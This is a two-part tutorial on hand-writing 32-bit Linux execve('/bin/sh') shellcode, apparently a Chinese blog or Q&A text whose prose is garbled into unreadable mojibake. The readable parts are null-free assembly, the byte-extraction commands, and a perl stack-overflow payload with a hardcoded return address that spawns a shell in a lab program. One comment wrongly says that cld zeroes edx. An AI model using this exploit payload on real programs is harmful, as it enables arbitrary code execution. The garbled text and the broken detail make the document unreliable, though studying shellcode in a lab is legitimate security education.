Ⅰ 濡备綍缂栧啓shellcode 鍗氩
銆銆shellcode阃氩父鏄鐢变簬strcpy/sprintf绛夊瓧绗︿覆鍑芥暟阃犳垚婧㈠嚭锛屽洜姝ら氲繃𨱒ユ敞鍏ョ殑shellcode涓嶈兘鍑虹幇闆跺瓧鑺伞备絾瀹为檯杩愯岀殑浠g爜鏄闇瑕0镄勶纴闾e备綍澶勭悊锻锛
銆銆浣跨敤xor鎸囦护瀵瑰瘎瀛桦櫒杩涜屾竻闆舵垨钥卌ld锛屽傦细
銆銆xor eax, eax
銆銆xor ebx, ebx
銆銆xor ecx, ecx
銆銆cld ; 璇ユ寚浠ゅ筫dx杩涜屾竻闆
銆銆濡傛灉闇瑕佸皢eax镄勫艰祴涓0x5锛屼笉鑳界洿鎺ュ啓鎴恗ov eax, 0x05锛屽洜涓哄畠浼氱敓鎴愭満鍣ㄧ爜mov eax, 0x00000005锛屼细链0濉鍏呫傚彲浠ラ噰鐢ㄤ笅闱㈣繖涓鎶宸э细
銆銆xor eax, eax
銆銆mov al, 0x05
銆銆X86鏋朵笂瀵归氱敤瀵勫瓨鍣ㄩ兘鎻愪緵瀵瑰簲镄16浣嶅拰8瀵勫瓨锛屼笂杩颁緥瀛愬氨鏄阃氲繃瀹冩潵阆垮厤闆跺嚭鐜般
銆銆濡备綍鐭ラ亾缁濆瑰湴鍧
銆銆灏界″湪鍓嶉溃镄勬敾鍑讳緥瀛愪腑锛宻hellcode瀛樻斁镄勫湴鍧鏄宸茬煡阆撶殑锛屼絾涓嶅悓镄勬敾鍑讳腑锛屽畠镄勫湴鍧鏄浼氩彉鍖栫殑锛岄偅涔堟垜浠濡备綍缂栧啓shellcode涓崭緷璧栦简杩欎釜鍙桦寲镄勫湴鍧钥岄氱敤鍖栧憿锛 闾d箞闇瑕佸熺敤涓浜涚浉瀵硅烦杞鎸囦护𨱒ヨ幏鍙栫粷瀵瑰湴鍧
銆銆call鎸囦护鏄鐩稿硅浆璺筹纴浣嗕细鍦ㄦ爤涓婂帇涓婄粷瀵瑰湴鍧锛岀劧钖庡啀寮瑰嚭灏卞彲浠ヨ幏鍙栫粷瀵瑰湴鍧锛屽傦细
銆銆jmp short get_string
銆銆code:
銆銆pop eax ; 杩欓噷寮瑰嚭镄勬槸call鎸囦护铡嬫爤镄勪笅𨱒℃寚浠ょ殑鍦板潃锛屽嵆"hello world"瀛楃︿覆镄勫湴鍧
銆銆get_string:
銆銆call code
銆銆data:
銆銆db 'hello world', 0x0a
銆銆push鎸囦护灏嗘暟鎹铡嫔埌镙堜笂锛岀劧钖庤幏鍙杄sp镄勫硷纴灏辨槸鍒氩帇镙堟暟鎹镄勭粷瀵瑰湴鍧锛屽傦细
銆銆push 0x4b435546 ; 0x46, 0x55, 0x43, 0x4b 鍒嗗埆 FUCK瀛楃︾殑 ascii镰
銆銆mov eax, esp ; 灏"FUCK"瀛楃︿覆棣栧湴鍧璧嬬粰eax锛屽悗缁鍙鐢ㄤ簬绯荤粺璋幂敤浼犲弬
銆銆linux绯荤粺璋幂敤绾﹀畾
銆銆Linux绯荤粺璋幂敤鏄浠int 0x80鎸囦护𨱒ラ櫡鍏ュ唴镙告佺殑锛岀郴缁熻皟鐢ㄥ彿阃氲繃eax𨱒ヤ紶阃掞纴鍙傛暟鍒嗗埆鏄痚bx, ecx, edx, edi, esi𨱒ヤ紶阃掋
銆銆缂栧啓shellcode
銆銆鍦↙inux涓嬬紪鍐檚hellcode锛屽彲浠ョ洿鎺ヤ娇鐢╣cc瀵规眹缂.S鏂囦欢杩涜岀紪璇戦摼鎺ワ纴鐢熸垚镙囧嗳镄勫彲镓ц孍LF鏂囦欢锛屽悓镞朵篃鑳界洿鎺ヨ繘琛屾祴璇曪纴浣嗘湁涓镣逛笉鏂逛究鏄镄勬彁鍙栨満鍣ㄧ爜寰堜笉鏂逛究銆
銆銆涓轰简鏂逛究鐢ㄦ彁鍙栨満鍣ㄧ爜锛屼娇鐢╪asm缂栬疟鍣ㄧ敓鎴恇in镙兼枃浠讹纴娌℃湁浠讳綍鍏跺畠镙煎纺鏁版嵁锛屾柟渚跨洿鎺ユ彁鍙栥
銆銆鎴戜滑瑕佺紪鍐欑殑链鍦皊hellcode锛屽瑰簲C 璇瑷阃昏緫濡备笅
銆銆char *argv[2];
銆銆argv[0] = "/bin/sh";
銆銆argv[1] = NULL;
銆銆execve("/bin/sh", argv, NULL);
銆銆缈昏疟鎴愭眹缂栬瑷杩囩▼濡备笅锛
銆銆灏"/bin/sh"瀛楃︿覆铡嫔埌镙堜笂锛屽寘钖瀛楃︿覆缁扑覆绗'\0'
銆銆xor edx, edx
銆銆push edx
銆銆push 0x68732f2f
銆銆push 0x6e69622f
銆銆灏嗗瓧绗︿覆/bin//sh铡嫔叆镙埚唴锛屽悓镞堕氲繃push edx𨱒ヤ缭璇佸瓧绗︿覆钖庨溃镄勬暟镓鎹鏄0锛屼篃鍗冲瓧绗︿覆缁撴潫绗︺ 璇锋敞镒忥纴镙堟槸浠庨珮鍦板潃钖戜绠鍦板潃鐢熼暱镄勶纴镓浠ヨ佷粠瀛楃︿覆灏惧反铡嬭捣銆
銆銆mov ebx, esp
銆銆姝ゆ椂镙埚簳灏辨槸瀛楃︿腑鍧镄勫紑濮嫔湴鍧锛岃ユ寚浠ゅ皢瀛楃︿覆鍦板潃璧嬬粰ebx(绯荤粺璋幂敤镄勭涓涓鍙傛暟锛
銆銆灏嗕笅𨱒ユ槸灏哸rgv[2]鏁扮粍镄勫唴瀹规斁鍒版爤涓娿
銆銆push edx ; 灏哸rgv[1](鍊间负 NULL) 鏀惧埌镙堜笂
銆銆push ebx ; 灏哸rgv[0]( "/bin//sh")鏀惧埌镙堜笂
銆銆姝ゆ椂esp鎸囧悜镄勭┖闂达纴鍒氭墠瀵瑰簲argv[2]鏁扮粍缁撴瀯镄勫紑濮嫔湴鍧
銆銆鐢变簬argv鏄绯荤粺璋幂敤绗浜屽弬鏁帮纴闇瑕佸皢瀹冭祴缁檈cx
銆銆mov ecx, esp
銆銆xor eax, eax,
銆銆mov al, 0xb
銆銆鍒拌繖镞, eax 涓 11锛堢郴缁熻皟鐢ㄥ彿锛夛纴ebx涓"/bin//sh"瀛楃﹀彿锛堢涓鍙傛暟锛夛纴ecx涓篴rgv鏁扮粍锛堢浜屽弬鏁帮级锛宔dx涓篘ULL锛堢涓夊弬鏁帮级锛岄偅灏卞彲浠ョ洿鎺ヤ娇鐢╥nt 0x80杩涜岀郴缁熻皟鐢ㄤ简銆
銆銆int 0x80
銆銆灏嗕笂杩版寚浠ゆ嫾鍦ㄤ竴璧峰氨鏄濡备笅镄勬眹缂栦唬镰侊细
銆銆[plain] view plainprint?鍦–ODE涓婃煡鐪嬩唬镰佺墖娲剧敓鍒版垜镄勪唬镰佺墖
銆銆BITS 32
銆銆
銆銆xor edx, edx
銆銆push edx
銆銆push 0x68732f2f
銆銆push 0x6e69622f
銆銆
銆銆mov ebx, esp
銆銆
銆銆push edx
銆銆push ebx
銆銆
銆銆mov ecx, esp
銆銆
銆銆xor eax, eax
銆銆mov al, 0xb
銆銆
銆銆int 0x80
銆銆缂栬疟鐢熸垚链哄櫒镰
銆銆nasm -o shell2 shell2.s
銆銆鐢熸垚镄剆hell2鏂囦欢涓篵in鏁版嵁锛屽叏鏄链哄櫒镰侊纴娌℃湁浠讳綍镙煎纺鏁版嵁锛屼娇鐢↙inux锻戒护杞鎹㈡垚bash鎴栬卲erl鍙杈揿叆镄剆hellcode.
銆銆$ od -t x1 shell2 | sed -e 's/[0-7]*//' | sed -e 's/ /\\x/g'
銆銆\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52
銆銆\x53\x89\xe1\x31\xc0\xb0\x0b\xcd
銆銆铹跺悗浣跨敤涔嫔墠镄剆tack1绋嫔簭杩涜屾祴璇曪细
銆銆$ echo $$
銆銆2503
銆銆$ perl -e 'printf "A"x48 . "\x10\xd7\xff\xff" . "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"' > bad.txt;./stack1
銆銆data: ▒▒▒1▒Rh//shh/bin▒▒RS▒▒1▒
銆銆̀▒▒▒
銆銆$ echo $$
銆銆4398
銆銆璇存槑锛欤cho $$锻戒护杈揿嚭褰揿墠shell锛埚嵆bash鎴栬却h)镄刾id
銆銆鍓嶅悗涓ゆ′笉涓镙凤纴闾e氨璇存槑 shellcode镓ц屽悗锛屾墦寮浜嗕竴涓鏂皊hell銆 涔熷嵆shellcode杩愯屾垚锷燂纴娴嬭瘯阃氲繃銆
Ⅱ linux鐜澧冧笅镄剆hellcode涓轰粈涔堜笉璋幂敤libc涓镄 搴揿嚱鏁帮纴钥屾槸鍒╃敤绯荤粺璋幂敤
镐庝箞鍒╃敤libc锛焥hellcode闇瑕佸湪瀵规柟链哄櫒涓婅繍琛屻傝屾ゆ椂shellcode骞朵笉鏄涓涓瀹屾暣镄勫簲鐢ㄧ▼搴忥纴瀹冨彧鏄甯︽湁婕忔礊鏀诲嚮鎸囦护镄勬暟鎹銆傝皟鐢╨ibc寰楀规柟链哄櫒涓婄殑锷ㄦ侀摼鎺ュ姞杞藉櫒缁欎綘锅氶摼鎺ャ傛妧链闂棰樻瘆鐩存帴绯荤粺璋幂敤杩桦嶆潅銆